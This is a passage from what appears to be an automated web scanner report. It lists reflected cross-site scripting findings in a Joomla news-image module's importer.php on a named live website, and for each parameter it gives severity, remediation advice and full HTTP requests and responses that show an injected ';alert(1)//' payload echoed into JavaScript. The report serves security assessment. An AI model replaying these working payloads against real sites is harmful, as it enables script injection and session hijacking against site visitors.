GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000f0c62%3balert(1)//1b0eb0bc8a4&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000f0c62;alert(1)//1b0eb0bc8a4,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
...[SNIP]...

2.46. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_speed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_speed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ee3a%3balert(1)//1593c8e07e8 was submitted in the animation_slide_speed parameter. This input was echoed as 2ee3a;alert(1)//1593c8e07e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=5002ee3a%3balert(1)//1593c8e07e8&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":5002ee3a;alert(1)//1593c8e07e8,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_
...[SNIP]...

2.47. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c5710%3balert(1)//332a1715734 was submitted in the animation_slide_type parameter. This input was echoed as c5710;alert(1)//332a1715734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0c5710%3balert(1)//332a1715734&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0c5710;alert(1)//332a1715734,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inacti
...[SNIP]...

2.48. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_text_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_text_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8d26%3balert(1)//5b6a85ca483 was submitted in the animation_text_type parameter. This input was echoed as c8d26;alert(1)//5b6a85ca483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0c8d26%3balert(1)//5b6a85ca483&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0c8d26;alert(1)//5b6a85ca483,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "i
...[SNIP]...

2.49. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [autoanimation parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the autoanimation request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1874f%3balert(1)//ab4ff2d961a was submitted in the autoanimation parameter. This input was echoed as 1874f;alert(1)//ab4ff2d961a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=11874f%3balert(1)//ab4ff2d961a&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":11874f;alert(1)//ab4ff2d961a,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_bo
...[SNIP]...

2.50. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [base_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the base_bgcolor request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afe3"%3balert(1)//006abc4a1a3 was submitted in the base_bgcolor parameter. This input was echoed as 5afe3";alert(1)//006abc4a1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff5afe3"%3balert(1)//006abc4a1a3&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff5afe3";alert(1)//006abc4a1a3",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "in
...[SNIP]...

2.51. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [clickable_slides parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the clickable_slides request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload debb1%3balert(1)//390cebd0cf3 was submitted in the clickable_slides parameter. This input was echoed as debb1;alert(1)//390cebd0cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1debb1%3balert(1)//390cebd0cf3 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1debb1;alert(1)//390cebd0cf3,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

2.52. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_x request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74487%3balert(1)//eed7b2c0841 was submitted in the interface_x parameter. This input was echoed as 74487;alert(1)//eed7b2c0841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-2074487%3balert(1)//eed7b2c0841&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-2074487;alert(1)//eed7b2c0841,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

2.53. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_y request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83470%3balert(1)//8c079405adc was submitted in the interface_y parameter. This input was echoed as 83470;alert(1)//8c079405adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=083470%3balert(1)//8c079405adc&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
y":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":083470;alert(1)//8c079405adc,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

2.54. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b6d"%3balert(1)//5a45291e6bc was submitted in the mid parameter. This input was echoed as e3b6d";alert(1)//5a45291e6bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1e3b6d"%3balert(1)//5a45291e6bc&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1e3b6d";alert(1)//5a45291e6bc"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail
...[SNIP]...

2.55. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [text_block_opacity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the text_block_opacity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12cd9%3balert(1)//195831b8a90 was submitted in the text_block_opacity parameter. This input was echoed as 12cd9;alert(1)//195831b8a90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=012cd9%3balert(1)//195831b8a90&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":012cd9;alert(1)//195831b8a90,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   
...[SNIP]...

2.56. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a678b%3balert(1)//9cf7ce79c61 was submitted in the thumbnail_border parameter. This input was echoed as a678b;alert(1)//9cf7ce79c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1a678b%3balert(1)//9cf7ce79c61&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1a678b;alert(1)//9cf7ce79c61,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p"
...[SNIP]...

2.57. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca19a"%3balert(1)//c1fee88792f was submitted in the thumbnail_border_color parameter. This input was echoed as ca19a";alert(1)//c1fee88792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21ca19a"%3balert(1)//c1fee88792f&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
